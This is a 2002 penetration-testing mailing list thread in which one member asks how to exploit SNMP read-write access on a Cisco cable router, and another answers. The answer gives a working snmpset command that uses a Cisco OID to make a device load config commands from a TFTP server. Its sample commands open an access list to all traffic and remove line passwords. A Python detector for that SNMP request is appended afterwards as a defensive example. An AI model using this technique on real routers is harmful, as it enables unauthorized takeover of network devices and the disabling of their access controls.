Even though this is not exactly what you are looking for, you might wanna give it a try. I used this in the past to change configs & access-lists on remote Cisco routers/switches, using only the RW community.

Basically, this is the method to upload "config t" commands via TFTPBOOT. It basically gave me access to the router's configuration mode (conf t) command line. My box was set up as a TFTPBOOT & had the commands in a script, exactly how I would enter them on the config t prompt.

For ex. to kill & open access-list 15, I had this in my tftpboot script:

    no access-list 15
    access-list 15 permit ip any any

You could obviously add whatever you need like "line vty 0 4 no password PA$$WORD enable secret SECRETPA$$" etc...

Here's how I did it. I did set up a TFTPBOOT server on my box & sent an snmpset to the remote Cisco device. I used a Solaris box to send my SNMP request, this box had a TFTPBOOT set up as well. The script was located in the TFTPboot

    snmpset -c RWcommunity IPADDRESS_of_the_router .1.3.6.1.4.1.9.2.1.55.IP_ADDRESS_OF_YOUR_TFTPBOOT octetstring name_of_the_config_on_the_tftp

Ex:

    node 10.10.10.198
    RW private
    tftpboot address: 192.168.4.119
    File located in TFTPBOOT directory, containing the list of configuration commands: confg_file

    snmpset -c private 10.10.10.198 .1.3.6.1.4.1.9.2.1.55.192.168.4.119 octetstring confg_file

I used this little shortcut 'internally' & not out on the internet. I hope this works for you out there...

Cheers,
Sylvain Robichaud

-----Original Message-----
From: Wolf, Glenn [mailto:glenn.wolf@we-inc.com]
Sent: November 26, 2002 2:10 PM
To: pen-testat_private
Subject: Cisco UBR920 cable router - SNMP to change telnet passwords?

Hi,

As per the following vulnerability: http://online.securityfocus.com/bid/3758 ... does anyone know how to exploit SNMP read-write access to change or retrieve the usernames/passwords protecting the telnet access?

I have SNMP read-write access on the Cisco UBR920 cable router, so I could DoS it, but I'm looking for further access.

Thanks in advance,
Glenn

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sat Nov 30 2002 - 12:38:17 PST
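
A defender's view of the request described in the thread above, as an added example that is not part of the original messages: it scans SNMP request records for a set against the OID prefix used in the snmpset command and decodes the TFTP server address from the OID suffix. The record layout, timestamps and function names are constructed for illustration and do not come from any real logging tool.

```python
import ipaddress

# OID prefix taken from the snmpset command in the thread above; the four
# sub-identifiers that follow it carry the TFTP server's IPv4 address.
CONFIG_TRANSFER_PREFIX = (1, 3, 6, 1, 4, 1, 9, 2, 1, 55)

# Constructed sample records in a hypothetical layout:
# "<time> <source> <device> <pdu-type> <oid> <value>"
SAMPLE_LOG = """\
2002-11-26T14:10:01 192.168.4.119 10.10.10.198 set .1.3.6.1.4.1.9.2.1.55.192.168.4.119 confg_file
2002-11-26T14:10:05 192.168.4.50 10.10.10.198 get .1.3.6.1.2.1.1.5.0 -
2002-11-26T14:11:12 192.168.4.50 10.10.10.198 set .1.3.6.1.2.1.1.6.0 rack-12
2002-11-26T14:12:40 192.168.4.77 10.10.10.198 set 1.3.6.1.4.1.9.2.1.55.300.1.1.1 x
"""

def parse_oid(text):
    """Return the OID as a tuple of ints, or None if it is not numeric."""
    try:
        return tuple(int(part) for part in text.strip(".").split("."))
    except ValueError:
        return None

def tftp_server_from_oid(oid):
    """Return the IPv4 address encoded after the prefix, or None."""
    n = len(CONFIG_TRANSFER_PREFIX)
    if oid is None or oid[:n] != CONFIG_TRANSFER_PREFIX or len(oid) != n + 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(map(str, oid[n:]))))
    except ipaddress.AddressValueError:
        return None  # suffix is not a valid dotted quad, e.g. 300.1.1.1

def find_config_transfers(log_text):
    """Flag SNMP set records that name a TFTP server under the prefix."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split(maxsplit=5)
        if len(fields) != 6 or fields[3] != "set":
            continue  # skip malformed records and non-set PDUs
        when, source, device, _pdu, oid_text, value = fields
        server = tftp_server_from_oid(parse_oid(oid_text))
        if server is not None:
            alerts.append({"time": when, "source": source, "device": device,
                           "tftp_server": server, "file": value})
    return alerts

if __name__ == "__main__":
    print(*find_config_transfers(SAMPLE_LOG), sep="\n")
```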